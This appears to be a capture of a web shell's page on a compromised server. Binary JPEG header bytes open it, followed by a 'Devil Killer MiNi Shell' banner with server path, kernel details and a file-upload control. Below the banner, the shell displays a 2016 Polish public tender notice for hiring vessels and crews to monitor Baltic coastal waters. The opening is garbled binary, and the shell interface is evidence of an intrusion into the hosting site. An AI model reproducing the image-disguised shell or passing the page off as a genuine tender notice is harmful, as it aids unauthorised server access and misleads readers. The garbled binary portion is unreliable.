JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160113/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160113/9102-N-2016.html

<p class="kh_header"><b>Gdańsk: Wynajem jednostek pływających wraz z załogą w celu prowadzenia monitoringu morskich wód przejściowych i przybrzeżnych Bałtyku.</b><br>
<b>Numer ogłoszenia: 9102 - 2016; data zamieszczenia: 13.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Inspektorat Ochrony Środowiska , ul. Trakt św. Wojciecha 293, 80-001 Gdańsk, woj. pomorskie, tel. 058 3094911 do 13, faks 058 3094634.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gdansk.wios.gov.pl/pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem jednostek pływających wraz z załogą w celu prowadzenia monitoringu morskich wód przejściowych i przybrzeżnych Bałtyku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa wynajęcia jednostek pływających wraz z załogą, w celu prowadzenia monitoringu morskich wód przejściowych i przybrzeżnych Bałtyku (pobór prób wody  do 1 mili morskiej od brzegu). Badania monitoringowe prowadzone będą w roku 2016, w okresie od dnia podpisania umowy do 31.12.2016 roku, w dwóch rejonach: 
a) w rejonie od Krynicy Morskiej do Łeby - część I,
b) w rejonie Ustki i Rowów - część II.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.65.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przez Wykonawców składających oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę, wraz z ofertą, oświadczenia o spełnianiu warunków udziału w postępowaniu, z wykorzystaniem wzoru dokumentu stanowiącego załącznik nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę, wraz z ofertą, oświadczenia o spełnianiu warunków udziału w postępowaniu, z wykorzystaniem wzoru dokumentu stanowiącego załącznik nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dla części I przedmiotu zamówienia zostanie spełniony jeżeli Wykonawca wykaże, iż na czas realizacji zamówienia, będzie dysponował dwoma jednostkami pływającymi tj.:
podstawową jednostką pływającą, statkiem (jachtem motorowym) spełniającą wymogi określone w rozdziale III ust. 3.3 niniejszej SIWZ 
oraz
łodzią pontonową typu hybrydowego spełniającą wymogi określone w rozdziale III ust.3.4 niniejszej SIWZ. 

Warunek dla części II przedmiotu zamówienia zostanie spełniony jeżeli Wykonawca wykaże, iż na czas realizacji zamówienia, będzie dysponował podstawową jednostką pływającą, statkiem (jachtem motorowym) spełniającą wymogi określone w rozdziale III ust. 3.3  niniejszej SIWZ. 
Ocena spełniania wyżej wymienionych warunków dla cz. I i cz. II przedmiotu zamówienia, nastąpi na podstawie oświadczenia, którego wzór stanowi załącznik nr 5 do SIWZ oraz dokumentu, o którym mowa w rozdziale VI ust.6.1, pkt.6.1.2 SIWZ  (wykaz narzędzi, wyposażenia......).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę, wraz z ofertą, oświadczenia o spełnianiu warunków udziału w postępowaniu, z wykorzystaniem wzoru dokumentu stanowiącego załącznik nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę, wraz z ofertą, oświadczenia o spełnianiu warunków udziału w postępowaniu, z wykorzystaniem wzoru dokumentu stanowiącego załącznik nr 5 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">4) W celu potwierdzenia, że oferowane jednostki pływające tj. podstawowa jednostka pływająca i łódź pontonowa typu hybrydowego dla części I przedmiotu zamówienia, a w przypadku składnia oferty na cześć II przedmiotu zamówienia podstawowa jednostka pływająca, spełniają wymogi określone w rozdziale III ust. 3.3 i ust. 3.4  niniejszej SIWZ, odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda dołączenia do oferty:
a)dokumentów (materiałów, opisów) którymi dla Zamawiającego będą: świadectwa Polskiego Rejestru Statków lub świadectwa równoważnego towarzystwa klasyfikacyjnego, karty bezpieczeństwa lub inne dokumenty uprawniające do wykonania przedmiotu zamówienia. Materiały, o których mowa, winny zapewnić Zamawiającemu, możliwość samodzielnej weryfikacji spełniania przez przedmiot zamówienia tj. przez podstawową jednostkę pływającą i łódź pontonową typu hybrydowego dla części I przedmiotu zamówienia a w przypadku składnia oferty na cześć II przedmiotu zamówienia podstawową jednostkę pływającą, stawianych wymogów w zakresie parametrów technicznych, sprzętowych itp.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo(oryginał) zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, określające jego zakres i podpisane przez upoważnioną osobę (osoby) - osobę fizyczną lub osoby reprezentujące osobę prawną. Pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną. Jeśli Wykonawca dołącza do oferty kserokopię pełnomocnictwa, musi być ona uwierzytelniona przez notariusza. 
2.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których jest mowa w pkt III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionych nie wcześniej niż w terminach określonych dla tych dokumentów. 
3.Zamawiający, zgodnie z art. 24 ust. 2a ustawy Pzp, wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonała zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Doświadczenie Wykonawcy - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość zmiany istotnych postanowień umowy w następujących przypadkach:
a)zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec zakres, termin realizacji przedmiotu umowy oraz wynagrodzenie (np. gdy nastąpi konieczność zmiany terminu lub zakresu wykonania przedmiotu umowy na skutek zmiany zasad finansowania zadania wynikających z podpisanych przez Zamawiającego umów z Narodowym Funduszem Ochrony Środowiska i Gospodarki Wodnej w Warszawie);
b)zakres przedmiotu usługi określony umową może zostać ograniczony przez Zamawiającego, bez skutków finansowych i prawnych dla Zamawiającego, w przypadku gdy wykonanie przedmiotu umowy w pełnym zakresie nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć. W przypadku ograniczenia zakresu przedmiotu umowy wartość usługi wyłączonej zostanie ustalona w oparciu o stosowne zapisy wynikające z formularza cenowego, stanowiącego załącznik do umowy. W opisanej sytuacji nastąpi zmniejszenie wynagrodzenia i ustalenie jego nowej wartości. W powyższym przypadku Wykonawca może żądać jedynie wynagrodzenia należytego mu z tytułu zrealizowanej już części umowy.
c)zmiany spowodowane nieprzewidzianymi w umowie nadzwyczajnymi warunkami jak np. warunki pogodowe, awaria jednostki pływającej niemożliwa do usunięcia w krótkim terminie lub inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące obiektywną niemożliwością wykonania usługi w wyznaczonym terminie - zmianie może ulec zakres, termin realizacji umowy oraz wynagrodzenie,
d)zmiany podmiotów zdolnych do wykonania zamówienia, w przypadku zdarzeń losowych niezależnych od Wykonawcy, na uzasadnione wystąpienie Wykonawcy,
e)Zamawiający na pisemny wniosek Wykonawcy, dopuszcza zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji usługi. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę,
f)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania przedmiotu umowy, zgodnie ze specyfikacją istotnych warunków zamówienia i innymi dokumentami - Zamawiający dopuszcza możliwość zmiany umowy tj. terminu jej wykonania, zakresu oraz wysokości wynagrodzenia,
g)	zmiany stawki podatku VAT w przypadku urzędowej zmiany tej stawki - Zamawiający dopuszcza możliwość zmiany wynagrodzenia, za całość lub część realizowanego przedmiotu umowy, uwzględniającej zmianę wysokości stawki podatku VAT
2.	Zmiany umowy, o których mowa w ust. 15.6 wymagają aneksu w formie pisemnej pod rygorem nieważności i mogą zostać wprowadzone, jedynie w przypadku jeżeli obydwie Strony umowy zgodnie uznają, że zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji przedmiotu zamówienia.
3.	Przewiduje się także zmiany umowy polegające na:
a)	zmianie terminów lub kolejności wykonywanych poszczególnych rejsów  wymienionych w harmonogramach (zał. nr 1 i zał. nr 2 do umowy) w ramach wykonywania umowy, gdy nie zagrozi to prawidłowej realizacji przedmiotu umowy,
b)	zmianie w zakresie zgodnym z przepisami art. 144 ust. 1 ustawy Pzp, tj. takim, które nie będą stanowiły istotnych zmian postanowień umowy.
4.	Zmiany umowy, o których mowa w ust. 3  niniejszego rozdziału SIWZ nie wymagają aneksu w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wios-gdansk.bip.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Inspektorat Ochrony Środowiska w Gdańsku, Trakt Św. Wojciecha 293, 80 - 001 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2016 godzina 10:00, miejsce: Wojewódzki Inspektorat Ochrony Środowiska w Gdańsku, Trakt Św. Wojciecha 293,80 -001 Gdańsk, pok. nr 37(sekretariat), Ip..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> w rejonie od Krynicy Morskiej do Łeby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zamawiający planuje zrealizowanie w roku 2016, w okresie od dnia podpisania umowy do dnia 31.12.2016r., 63 rejsy (cykle pomiarowe). W zależności od warunków pogodowych, ilość dni rejsowych jak również planowane terminy rejsów wymienione w tab. 1 zał. nr 1 do SIWZ, mogą ulec zmianie.
2.Wykaz punktów pomiarowo kontrolnych na wodach przybrzeżnych i przejściowych Bałtyku, lokalizację oraz harmonogram i częstotliwość rejsów zaplanowanych w roku 2016 zawiera załącznik nr 1 do SIWZ (tab.1.).
3.W każdym miesiącu począwszy od  dnia podpisania umowy do  końca grudnia bieżącego roku, zaplanowano pobór prób wody powierzchniowej w 5-ciu punktów pomiarowych (T6a, OM1, ZG, C13a, C15), na co przewidziano 2 rejsy zgodnie z harmonogramem (tab.1) zał. nr 1 do SIWZ. Rejsy te odbywać się będą przy użyciu łodzi pontonowej typu hybrydowego, wodowanej z plaży położonej możliwie blisko punktu pomiarowego. Ponadto sześć razy w roku (w miesiącach III, V, VI, VII, IX, XI) zaplanowano pobór prób wody powierzchniowej i przydennej w 14 punktach pomiarowych na co przewidziano 6 rejsów w każdym miesiącu. W miesiącu wrześniu planuje się dodatkowy pobór próbek osadów dennych w pięciu punktach. 
4.Kolejność poboru próbek na poszczególnych punktach zostanie ustalona z Wykonawcą na początku pierwszego cyklu.
5.Lokalizację punktów pomiarowo kontrolnych na wodach przejściowych Bałtyku przylegających do województwa pomorskiego zawiera zał. nr 2 do SIWZ (tab. 2. i ryc. 1).
6.Lokalizację punktów pomiarowo kontrolnych na wodach przybrzeżnych Bałtyku, przylegających do województwa pomorskiego zawiera zał. nr 3 do SIWZ (tab. 3. i ryc. 2).
7.Z uwagi na lokalizację punktów monitoringowych wchodzących w skład części I przedmiotu zamówienia, preferowane jest, aby podstawowa jednostka pływająca stacjonowała w porcie w Gdyni.
8.Zamawiający posiada wszystkie niezbędne urządzenia do poboru próbek i badań wykonywanych z jednostki pływającej (czerpacze wody, dna, sita, pojemniki na próbki itp.).
9.Zamawiający przewiduje do realizacji zadań określonych dla części I przedmiotu zamówienia, wynikających z zakresu monitoringu, przez maksymalnie dwóch pracowników Zamawiającego.
10.Wykonawca winien zapewnić  przy realizacji części I przedmiotu zamówienia:  
podstawową jednostkę pływającą (statek - jacht motorowy) spełniający wymagania opisane ust.3.3 niniejszego rozdziału SIWZ,
oraz
łódź pontonową typu hybrydowego zapewniającą możliwość wodowania jej z plaży, spełniającą wymagania opisane w ust.3.4 w niniejszej rozdziale SIWZ. Konieczność zapewnienia takiej łodzi związana jest ze znacznym oddaleniem od siebie punktów monitoringowych oraz bardzo napiętym harmonogramem rejsów. Zamawiający przewiduje, że w niektórych miesiącach, aby zachować zakładany interwał poboru prób, konieczne będzie użycie takiej łodzi. Jest wysoce prawdopodobne, że taka sytuacja może mieć miejsce szczególnie w punktach znacznie oddalonych od portów (punkty C19, C12, C13a, C15, C17, C18) kiedy z powodu niesprzyjającej pogody wielogodzinny rejs podstawową jednostką pływającą Wykonawcy może być znacząco utrudniony lub niemożliwy do realizacji.
11.Wykonawca winien także zapewnić oprócz jednostek pływających wskazanych powyżej, przy realizacji części I przedmiotu zamówienia:
a)lawetę do przewożenia łodzi pontonowej typu hybrydowego, 
b)odpowiedni samochód z napędem 4x4  w celu transportu  łodzi pontonowej oraz sprawnego wodowania w/w łodzi z plaży,
